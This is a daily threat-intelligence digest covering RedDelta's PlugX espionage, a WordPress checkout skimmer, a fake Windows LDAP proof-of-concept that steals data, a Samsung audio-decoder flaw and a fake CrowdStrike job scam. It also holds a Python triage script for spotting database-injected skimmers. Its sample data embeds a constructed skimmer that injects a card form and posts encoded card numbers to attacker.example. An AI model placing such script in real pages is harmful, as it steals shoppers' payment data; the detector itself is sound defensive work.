
Cyware Daily Threat Intelligence, January 10, 2025


Daily Threat Briefing Jan 10, 2025

China-linked RedDelta has intensified its cyber-espionage activity across Asia, targeting government and political entities in multiple countries. The group used spear-phishing to deliver a modified PlugX backdoor. Notable breaches include the Mongolian Ministry of Defense and the Communist Party of Vietnam, underscoring RedDelta's evolving methods and broad geographical reach.

In a deceptive twist, threat actors have created a fake PoC exploit tied to a patched Microsoft Windows LDAP vulnerability to lure security researchers. The malicious PoC, hosted on a repository, drops a PowerShell script upon execution, stealing computer information and sending it to an external FTP server.

CrowdStrike uncovered a phishing scheme where attackers impersonated the company, offering fake job opportunities to lure victims. Targets were directed to download a fraudulent CRM application, which bypassed sandbox checks to install a Monero miner. The malware operated stealthily in the background, ensuring persistence through startup scripts and registry entries.

Top Malware Reported in the Last 24 Hours

RedDelta drops PlugX, targets Taiwan

RedDelta, a China-linked threat actor, targeted Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia between July 2023 and December 2024 to deliver a modified version of the PlugX backdoor. RedDelta reportedly compromised the Mongolian Ministry of Defense in August 2024 and the Communist Party of Vietnam in November 2024. It also targeted victims in Malaysia, Japan, the U.S., Ethiopia, Brazil, Australia, and India from September to December 2024. Known for refining its infection methods, RedDelta has used Windows files in spear-phishing attacks to deploy PlugX through various techniques.

Credit card skimmer targets WP checkout pages

Sucuri discovered a sophisticated credit card skimmer malware targeting WordPress websites. The malware operates by injecting malicious JavaScript into the WordPress database, allowing it to steal sensitive payment details from checkout pages. It creates fake payment forms or hijacks existing ones to capture users' credit card information, which is then encoded, encrypted, and sent to a remote server controlled by attackers. 
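Because this skimmer lives in the WordPress database rather than in theme or plugin files, a file-integrity scan will not catch it. The following added example (not Sucuri's code or the original article's) shows a heuristic triage of stored option values: it flags inline scripts that reference checkout pages, build forms, encode data, and post to an external host. The sample rows are constructed; the host attacker.example is a placeholder.

```python
import re

# Constructed sample rows imitating wp_options values (e.g. block widgets).
SAMPLE_OPTIONS = {
    "widget_block_1": "<p>Welcome to our store</p>",
    "widget_block_2": (
        "<script>if(location.href.includes('checkout')&&!location.href.includes('cart')){"
        "var f=document.createElement('form');f.innerHTML='<input name=cc>';"
        "document.body.appendChild(f);f.onsubmit=function(){"
        "fetch('https://attacker.example/collect',{method:'POST',body:btoa(f.cc.value)})}}"
        "</script>"
    ),
    "widget_block_3": "<script src='/wp-includes/js/jquery/jquery.min.js'></script>",
}

# Each indicator on its own is benign; their combination inside one stored script is not.
INDICATORS = {
    "targets checkout/payment page": re.compile(r"checkout|payment|billing", re.I),
    "injects or rewrites a form": re.compile(r"createElement\(['\"]form|innerHTML\s*=", re.I),
    "encodes/obfuscates data": re.compile(r"\b(atob|btoa|fromCharCode|eval|unescape)\s*\(", re.I),
    "sends data out": re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new Image)\b"),
    "contacts external host": re.compile(r"https?://(?!localhost)[^'\"\s)]+"),
}


def score_option(value):
    """Return (score, reasons) for one stored value; only inline <script> bodies are scored."""
    if "<script" not in value.lower():
        return 0, []
    reasons = [name for name, rx in INDICATORS.items() if rx.search(value)]
    return len(reasons), reasons


def find_suspicious(options, threshold=3):
    """Map option name -> matched indicators for values at or above the threshold.

    This is triage, not proof: legitimate payment integrations can trip a few
    indicators, so review each hit by hand before cleaning the row.
    """
    hits = {}
    for name, value in options.items():
        score, reasons = score_option(value)
        if score >= threshold:
            hits[name] = reasons
    return hits


if __name__ == "__main__":
    for name, reasons in find_suspicious(SAMPLE_OPTIONS).items():
        print(name, "->", ", ".join(reasons))
```

In a real engagement the same function is run over a dump of wp_options and wp_posts (for example via `wp db query` or `wp option list`), since the page notes the injection sits in the database itself.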

Fake PoC deploys info-stealer

Threat actors have developed a fake PoC exploit for a critical Microsoft vulnerability to trick security researchers into downloading information-stealing malware. The fake PoC is tied to a vulnerability in Microsoft's Windows LDAP that was patched in December 2024. Attackers created a malicious repository hosting the fake PoC, which, when run, drops a PowerShell script that creates a Scheduled Job, collects computer information, and uploads the data to an external FTP server.

Top Vulnerabilities Reported in the Last 24 Hours

Zero-click exploit targets Samsung devices

Cybersecurity researchers disclosed a patched security flaw affecting Monkey's Audio (APE) decoder on Samsung smartphones, posing a risk of code execution. The vulnerability, tracked as CVE-2024-49415, impacts devices running Android versions 12, 13, and 14. The flaw can be exploited without user interaction under specific conditions, such as when Google Messages is set up for rich communication services. The issue arises from the decoding of incoming audio, potentially leading to a buffer overflow and causing the media codec process to crash.

Top Scams Reported in the Last 24 Hours

Fake job offer spreads Monero miner

CrowdStrike has detected a phishing campaign impersonating the company with fake job offer emails. The emails direct targets to download a fake "employee CRM application" from a malicious website designed to look like CrowdStrike's portal. If the target passes sandbox checks, the application tricks them into installing a Monero cryptocurrency miner. The miner runs in the background to avoid detection, and persistence is achieved through a startup script and registry entry.
